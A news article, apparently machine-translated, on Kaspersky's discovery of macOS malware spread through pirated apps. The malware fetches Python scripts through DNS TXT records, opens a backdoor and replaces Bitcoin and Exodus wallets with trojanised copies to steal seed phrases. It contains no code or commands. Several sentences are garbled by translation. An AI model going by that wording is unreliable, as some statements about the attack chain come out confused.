Wednesday 24 January 2024 – 11.04pm WIB
Jakarta – Kaspersky researchers have discovered an unconventional type of macOS malware. This previously unknown malicious software suite, covertly distributed via pirated apps, targets macOS users’ crypto assets, which are stored in digital wallets.
Unlike the proxy Trojans previously discovered by Kaspersky, this new threat focuses on compromising the Trojan.
New macOS backdoor targets crypto asset wallets
This cryptographic Trojan is unique in two ways: First, it uses DNS records to deliver its malicious Python scripts. Secondly, it not only stole the crypto wallet, but also replaced the wallet app with an infected version of its own.
This allows you to steal secret phrases used to access crypto assets stored in wallets.
The malware targets macOS version 13.6 and later, indicating a focus on users of the latest operating systems, both on Intel and Apple Silicon devices.
Image disk the compromised ones contained the sought-after “activators” and applications. The activator, which seems harmless at first glance, activates the compromised application after entering the user’s password.
The attacker uses a pre-compromised version of the application, manipulating the executable file so that it does not work until the user runs the trigger. This tactic ensures that users unknowingly activate compromised apps.
After the patching process, the malware executes its main payload by obtaining the DNS TXT record for the malicious domain and decrypting the domain’s Python script. The script runs endlessly attempting to download the next step in the infection chain, also a Python script.
The purpose of the next payload is to execute arbitrary commands received from the server. Although no orders were received during the investigation and back door updated regularly, it is evident that the malware campaign is still in development.
New macOS backdoor targets crypto asset wallets
The code indicates that the command is most likely a hard-coded Python script.
In addition to the features mentioned, the script contains two important features involving the apple-analyzer domain[.]com.
These two functions aim to verify the existence of a cryptocurrency wallet application and replace it with a version downloaded from the specified domain. This tactic appears to target Bitcoin and Exodus wallets, turning these applications into malicious entities.
2024-01-24 16:04:02
#Pirates #targeting #cryptocurrency #wallets